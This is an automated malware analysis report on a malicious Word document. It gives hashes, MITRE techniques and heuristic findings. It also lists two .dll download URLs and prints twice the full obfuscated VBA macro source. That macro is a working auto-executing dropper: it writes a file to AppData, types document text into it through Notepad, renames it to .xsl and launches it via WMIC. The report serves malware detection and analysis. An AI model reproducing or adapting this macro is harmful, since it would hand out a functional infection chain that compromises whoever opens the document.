Office (OLE) malware analysis — malicious · ca381193229b5474

MALICIOUS

Office (OLE)

499.5 KB Created: 2020-06-16 08:32:00 Authoring application: Microsoft Office Word First seen: 2020-07-24

MD5: 87aa7eb639985563f641d3487666f754 SHA-1: cede238e250945721cfd93b542490a3b7dd306e6 SHA-256: ca381193229b547475e5724d5ea9f202b92f72836e9ada71ebad288845de2bbf

238 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample contains VBA macros that leverage WScript.Shell and CreateObject to execute commands. The autoopen macro attempts to delete an inline shape and then calls a subroutine that uses 'scripting.filesystemobject' and 'wscript.shell'. This indicates the macro is designed to download and execute a second-stage payload from the URLs provided. The embedded JavaScript also contains references to these URLs and uses a delay function, suggesting it's part of the same malicious chain.

Heuristics 9

VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage
Matched line in script
```
Dim on_her_composure As String
on_her_composure = "wscript.shell"
```

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

Dim with_you_mr As String
Set charles_gets_to = CreateObject(from_her_heart)

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub autoopen()
```

Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)

Matched line in script

arose_to_come = Environ(portrait_undoubtedly_see)
you_heard_her = arose_to_come & pride_and_look & but_well_is & through_with

Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL https://batriaruum.com/dasruol.dll In document text (OLE body)
- https://penotorc.com/topwin.dllIn document text (OLE body)
- http://www.w3.org/1999/XSL/TransformIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8644 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	8644 bytes
SHA-256: `53e0184e5a8edc70d4106f1625e527163b9acf74d875e0fd0c6992da9c572619`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub autoopen() Dim though_the_day As String though_the_day = "00:00:01" ActiveDocument.InlineShapes(1).Delete ActiveDocument.InlineShapes(1).ScaleHeight = 64 ActiveDocument.InlineShapes(1).ScaleWidth = 76 refuge_in = Now() + TimeValue(though_the_day) While Now() < refuge_in Debug.Print Now() Wend Dim charles_gets_to As Object Dim from_her_heart As String from_her_heart = "scripting.filesystemobject" 'to their marriage may Dim with_you_mr As String Set charles_gets_to = CreateObject(from_her_heart) Call she_still_greater(charles_gets_to) them_to_his dear_sir_william such_an_ensigncy End Sub Attribute VB_Name = "more_interesting_mode" Sub them_to_his() wonder_if_it End Sub Attribute VB_Name = "they_bent" Sub wonder_if_it() on_the_charge End Sub Attribute VB_Name = "out_its_acceptance" Sub on_the_charge() elizabeth_was_repeated End Sub Attribute VB_Name = "they_no_means" Sub elizabeth_was_repeated() the_parlour_and End Sub Attribute VB_Name = "so_pleasing" Sub the_parlour_and() advantage_bingley End Sub Attribute VB_Name = "for_that_bingley" 'of mr bingley tired of Option Explicit Public arose_to_come As String Public you_heard_her As String Sub she_still_greater(little_something) Dim on_her_composure As String on_her_composure = "wscript.shell" Dim but_well_is As String Dim pride_and_look As String pride_and_look = "\" Dim your_fancy As Long Dim less_of_discourse As Variant Dim through_with As String through_with = ".txt" 'expressions in vain indeed it Dim raising_expectations As Variant Dim contempt_of_receiving As String contempt_of_receiving = "by_the_mistake" Dim the_assembly_the As String the_assembly_the = "with_all_grateful" Dim rooted_dislike_of As String rooted_dislike_of = "long_expectations_which" Dim it_in_her As String it_in_her = "may_befall" Dim and_ill_that As String and_ill_that = "partiality_had_better" Dim that_considering_his As String that_considering_his = "as_much_earnest" raising_expectations = Array(contempt_of_receiving, the_assembly_the, rooted_dislike_of, it_in_her, and_ill_that, that_considering_his) less_of_discourse = Array(1) For your_fancy = 1 To less_of_discourse(Int((UBound(less_of_discourse) - LBound(less_of_discourse) + 1) * Rnd + LBound(less_of_discourse))) but_well_is = but_well_is & raising_expectations(Int((UBound(raising_expectations) - LBound(raising_expectations) + 1) * Rnd + LBound(raising_expectations))) Next your_fancy 'but a regret she Dim portrait_undoubtedly_see As String portrait_undoubtedly_see = "appdata" arose_to_come = Environ(portrait_undoubtedly_see) you_heard_her = arose_to_come & pride_and_look & but_well_is & through_with Dim to_the_visit As Object Set to_the_visit = little_something.CreateTextFile(you_heard_her, True, True) to_the_visit.Close End Sub Attribute VB_Name = "secured_when_questioned" Sub dear_sir_william() that_man_cannot End Sub Attribute VB_Name = "to_you_wish" Sub that_man_cannot() in_an_expression End Sub Attribute VB_Name = "walk_of_the" Sub in_an_expression() sum_that_does End Sub Attribute VB_Name = "their_sudden_and" Sub sum_that_does() mr_collins_she End Sub Attribute VB_Name = "an_hour_she" Sub advantage_bingley() Dim exclaiming_this_as As String exclaiming_this_as = "wscript.shell" Dim though_he_could As String though_he_could = "notepad " appear_perfectly = though_he_could & Chr(34) & you_heard_her & Chr(34) On Error Resume Next: Wscript.Quit = ("" & CreateObject(((exclaiming_this_as))).Run((though_he_could & you_heard_her), (0), (0))) End Sub Attribute VB_Name = "feel_on_her" Sub such_an_ensigncy() you_i_understand End Sub Attribute VB_Name = "of_civility" Sub you_i_understand() either_side_elizabeth End Sub Attribute VB_Name = "the_room_that" Sub either_side_elizabeth() it_too_with End Sub Attribute VB_Name = "pride_pride_yes" Public Declare PtrSafe Function and_it_on Lib "user32.dll" Alias "PostMessageA" (ByVal in_a_soul As Long, ByVal nor_when_darcy As Long, ByVal with_the_defects As Long, ByVal elizabeth_i_had As Long) As Long Public Const as_well_lizzy As Long = &H3 Public Const expressions_elizabeth_related As Long = &H102 Public Const and_was_wishing As Long = &H111 Public Const was_pronounced As Long = &H112 Public Declare PtrSafe Function only_been_complete Lib "user32.dll" Alias "FindWindowExA" (ByVal or_relating As Long, ByVal i_have_got As Long, ByVal in_his_younger As String, ByVal and_she_always As String) As Long Public Const but_hurrying As Long = &H10 Public Const then_to_such As Long = &H46 Sub mr_collins_she() Dim kitty_though_every As String kitty_though_every = "00:00:03" Dim their_first_meeting As String their_first_meeting = "notepad" lively_attention_and = Now() + TimeValue(kitty_though_every) While Now() < lively_attention_and Debug.Print Now() Wend If Len(you_heard_her) > 0 Then Dim so_severe_on As Paragraph Dim the_parents As Object Dim too_pleasantly_but As String Dim moreover_she As String moreover_she = "edit" Dim to_the_better As String Dim young_ladies_by As String young_ladies_by = "<" most_painful_regrets = Now() + TimeValue(kitty_though_every) While Now() < most_painful_regrets Debug.Print Now() Wend so_alarming = only_been_complete(0, 0, their_first_meeting, vbNullString) with_wickham_himself = only_been_complete(so_alarming, 0, moreover_she, vbNullString) For Each so_severe_on In ActiveDocument.Paragraphs to_the_better = so_severe_on.Range.Text If InStr(1, to_the_better, young_ladies_by) = 1 Then Dim or_rapidity_of As String or_rapidity_of = Replace(to_the_better, young_ladies_by, "", 1, 1) For on_that_the = 1 To Len(or_rapidity_of) For the_smallest_intention = 1 To 1295 were_still_more = Asc(Mid(or_rapidity_of, on_that_the, 1)) Next the_smallest_intention and_it_on with_wickham_himself, expressions_elizabeth_related, were_still_more, 0 Next on_that_the End If Next so_severe_on End If and_it_on so_alarming, and_was_wishing, as_well_lizzy, then_to_such lively_attention_and = Now() + TimeValue(kitty_though_every) While Now() < lively_attention_and Debug.Print Now() Wend and_it_on so_alarming, but_hurrying, 0, 0 End Sub Attribute VB_Name = "resemblance_to_laughter" Attribute VB_Name = "themselves_the_luckless" Attribute VB_Name = "to_go_alone" Attribute VB_Name = "the_names_facts" Attribute VB_Name = "such_a_fortnight" Attribute VB_Name = "occasions_and_burying" Attribute VB_Name = "though_you" Attribute VB_Name = "in_the_entrance" Sub it_too_with() Dim in_your_picture As String in_your_picture = "WmIC" Dim a_great_danger As String a_great_danger = ".txt" Dim and_might_be As String and_might_be = ".xsl" Dim the_world_in As String the_world_in = "consolewindowclass" Dim that_this_civil As String that_this_civil = "process list /format:" Dim having_concealed As String having_concealed = "00:00:01" Dim happy_prospect_of As String happy_prospect_of = "wscript.shell" Dim well_avoid As String well_avoid = """" On Error Resume Next: Wscript.Quit = ("" & CreateObject(((happy_prospect_of))).Run((in_your_picture), (0), (0))) newn = Replace(you_heard_her, a_great_danger, and_might_be) Name you_heard_her As newn or_two_sixth = Now() + TimeValue(having_concealed) While Now() < or_two_sixth Wend to_make_both = that_this_civil & well_avoid & newn & well_avoid For never_to_dine = 1 To Len(to_make_both) For but_luckily_he = 1 To 1059415 the_means_or = Asc(Left$(Mid$(to_make_both, never_to_dine), 1)) Next but_luckily_he civilities_were_separating = only_been_complete(0, 0, the_world_in, vbNullString) On Error Resume Next: Wscript.Quit = ("" & and_it_on((civilities_were_separating), (expressions_elizabeth_related), (the_means_or), (0))) Next never_to_dine On Error Resume Next: Wscript.Quit = ("" & and_it_on((civilities_were_separating), (expressions_elizabeth_related), (Asc(vbNewLine)), (0))) End Sub

SHA-256: 53e0184e5a8edc70d4106f1625e527163b9acf74d875e0fd0c6992da9c572619

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub autoopen()

Dim though_the_day As String
though_the_day = "00:00:01"


ActiveDocument.InlineShapes(1).Delete


ActiveDocument.InlineShapes(1).ScaleHeight = 64

ActiveDocument.InlineShapes(1).ScaleWidth = 76


refuge_in = Now() + TimeValue(though_the_day)


While Now() < refuge_in


 Debug.Print Now()

 Wend


Dim charles_gets_to As Object


Dim from_her_heart As String
from_her_heart = "scripting.filesystemobject"

'to their marriage may
Dim with_you_mr As String
Set charles_gets_to = CreateObject(from_her_heart)


Call she_still_greater(charles_gets_to)

them_to_his
dear_sir_william

such_an_ensigncy

End Sub

Attribute VB_Name = "more_interesting_mode"
Sub them_to_his()
wonder_if_it
End Sub

Attribute VB_Name = "they_bent"
Sub wonder_if_it()
on_the_charge
End Sub

Attribute VB_Name = "out_its_acceptance"
Sub on_the_charge()
elizabeth_was_repeated
End Sub

Attribute VB_Name = "they_no_means"
Sub elizabeth_was_repeated()
the_parlour_and
End Sub

Attribute VB_Name = "so_pleasing"
Sub the_parlour_and()
advantage_bingley
End Sub

Attribute VB_Name = "for_that_bingley"



'of mr bingley tired of

Option Explicit


Public arose_to_come As String


Public you_heard_her As String

Sub she_still_greater(little_something)



Dim on_her_composure As String
on_her_composure = "wscript.shell"

Dim but_well_is As String



Dim pride_and_look As String
pride_and_look = "\"



Dim your_fancy As Long


Dim less_of_discourse As Variant


Dim through_with As String
through_with = ".txt"


'expressions in vain indeed it


Dim raising_expectations As Variant


Dim contempt_of_receiving As String
contempt_of_receiving = "by_the_mistake"


Dim the_assembly_the As String
the_assembly_the = "with_all_grateful"


Dim rooted_dislike_of As String
rooted_dislike_of = "long_expectations_which"


Dim it_in_her As String
it_in_her = "may_befall"


Dim and_ill_that As String
and_ill_that = "partiality_had_better"


Dim that_considering_his As String
that_considering_his = "as_much_earnest"



raising_expectations = Array(contempt_of_receiving, the_assembly_the, rooted_dislike_of, it_in_her, and_ill_that, that_considering_his)
 less_of_discourse = Array(1)
For your_fancy = 1 To less_of_discourse(Int((UBound(less_of_discourse) - LBound(less_of_discourse) + 1) * Rnd + LBound(less_of_discourse)))
    but_well_is = but_well_is & raising_expectations(Int((UBound(raising_expectations) - LBound(raising_expectations) + 1) * Rnd + LBound(raising_expectations)))


    Next your_fancy

'but a regret she


Dim portrait_undoubtedly_see As String
portrait_undoubtedly_see = "appdata"

arose_to_come = Environ(portrait_undoubtedly_see)
you_heard_her = arose_to_come & pride_and_look & but_well_is & through_with
Dim to_the_visit As Object
Set to_the_visit = little_something.CreateTextFile(you_heard_her, True, True)

to_the_visit.Close

End Sub

Attribute VB_Name = "secured_when_questioned"
Sub dear_sir_william()
that_man_cannot
End Sub

Attribute VB_Name = "to_you_wish"
Sub that_man_cannot()
in_an_expression
End Sub

Attribute VB_Name = "walk_of_the"
Sub in_an_expression()
sum_that_does
End Sub

Attribute VB_Name = "their_sudden_and"
Sub sum_that_does()
mr_collins_she
End Sub

Attribute VB_Name = "an_hour_she"



Sub advantage_bingley()



Dim exclaiming_this_as As String
exclaiming_this_as = "wscript.shell"


Dim though_he_could As String
though_he_could = "notepad "


appear_perfectly = though_he_could & Chr(34) & you_heard_her & Chr(34)

On Error Resume Next: Wscript.Quit = ("" & CreateObject(((exclaiming_this_as))).Run((though_he_could & you_heard_her), (0), (0)))

End Sub

Attribute VB_Name = "feel_on_her"
Sub such_an_ensigncy()
you_i_understand
End Sub

Attribute VB_Name = "of_civility"
Sub you_i_understand()
either_side_elizabeth
End Sub

Attribute VB_Name = "the_room_that"
Sub either_side_elizabeth()
it_too_with
End Sub

Attribute VB_Name = "pride_pride_yes"



Public Declare PtrSafe Function and_it_on Lib "user32.dll" Alias "PostMessageA" (ByVal in_a_soul As Long, ByVal nor_when_darcy As Long, ByVal with_the_defects As Long, ByVal elizabeth_i_had As Long) As Long
Public Const as_well_lizzy As Long = &H3
Public Const expressions_elizabeth_related As Long = &H102

Public Const and_was_wishing As Long = &H111


Public Const was_pronounced As Long = &H112


Public Declare PtrSafe Function only_been_complete Lib "user32.dll" Alias "FindWindowExA" (ByVal or_relating As Long, ByVal i_have_got As Long, ByVal in_his_younger As String, ByVal and_she_always As String) As Long


Public Const but_hurrying As Long = &H10
Public Const then_to_such As Long = &H46
Sub mr_collins_she()


Dim kitty_though_every As String
kitty_though_every = "00:00:03"


Dim their_first_meeting As String
their_first_meeting = "notepad"



lively_attention_and = Now() + TimeValue(kitty_though_every)


While Now() < lively_attention_and


 Debug.Print Now()
 Wend


If Len(you_heard_her) > 0 Then
Dim so_severe_on As Paragraph

Dim the_parents As Object


Dim too_pleasantly_but As String

Dim moreover_she As String
moreover_she = "edit"


Dim to_the_better As String



Dim young_ladies_by As String
young_ladies_by = "<"


most_painful_regrets = Now() + TimeValue(kitty_though_every)

While Now() < most_painful_regrets

 Debug.Print Now()

 Wend
so_alarming = only_been_complete(0, 0, their_first_meeting, vbNullString)
with_wickham_himself = only_been_complete(so_alarming, 0, moreover_she, vbNullString)
For Each so_severe_on In ActiveDocument.Paragraphs
to_the_better = so_severe_on.Range.Text
If InStr(1, to_the_better, young_ladies_by) = 1 Then


Dim or_rapidity_of As String
or_rapidity_of = Replace(to_the_better, young_ladies_by, "", 1, 1)
For on_that_the = 1 To Len(or_rapidity_of)
For the_smallest_intention = 1 To 1295

were_still_more = Asc(Mid(or_rapidity_of, on_that_the, 1))
Next the_smallest_intention
and_it_on with_wickham_himself, expressions_elizabeth_related, were_still_more, 0

Next on_that_the


End If
Next so_severe_on


End If

and_it_on so_alarming, and_was_wishing, as_well_lizzy, then_to_such


lively_attention_and = Now() + TimeValue(kitty_though_every)


While Now() < lively_attention_and
 Debug.Print Now()
 Wend
and_it_on so_alarming, but_hurrying, 0, 0


End Sub

Attribute VB_Name = "resemblance_to_laughter"

Attribute VB_Name = "themselves_the_luckless"

Attribute VB_Name = "to_go_alone"

Attribute VB_Name = "the_names_facts"

Attribute VB_Name = "such_a_fortnight"

Attribute VB_Name = "occasions_and_burying"

Attribute VB_Name = "though_you"

Attribute VB_Name = "in_the_entrance"


Sub it_too_with()



Dim in_your_picture As String
in_your_picture = "WmIC"


Dim a_great_danger As String
a_great_danger = ".txt"


Dim and_might_be As String
and_might_be = ".xsl"


Dim the_world_in As String
the_world_in = "consolewindowclass"


Dim that_this_civil As String
that_this_civil = "process list /format:"


Dim having_concealed As String
having_concealed = "00:00:01"




Dim happy_prospect_of As String
happy_prospect_of = "wscript.shell"


Dim well_avoid As String
well_avoid = """"



On Error Resume Next: Wscript.Quit = ("" & CreateObject(((happy_prospect_of))).Run((in_your_picture), (0), (0)))


newn = Replace(you_heard_her, a_great_danger, and_might_be)

Name you_heard_her As newn
or_two_sixth = Now() + TimeValue(having_concealed)
While Now() < or_two_sixth

 Wend


to_make_both = that_this_civil & well_avoid & newn & well_avoid

For never_to_dine = 1 To Len(to_make_both)
For but_luckily_he = 1 To 1059415

the_means_or = Asc(Left$(Mid$(to_make_both, never_to_dine), 1))

Next but_luckily_he


civilities_were_separating = only_been_complete(0, 0, the_world_in, vbNullString)


On Error Resume Next: Wscript.Quit = ("" & and_it_on((civilities_were_separating), (expressions_elizabeth_related), (the_means_or), (0)))
Next never_to_dine


On Error Resume Next: Wscript.Quit = ("" & and_it_on((civilities_were_separating), (expressions_elizabeth_related), (Asc(vbNewLine)), (0)))

End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.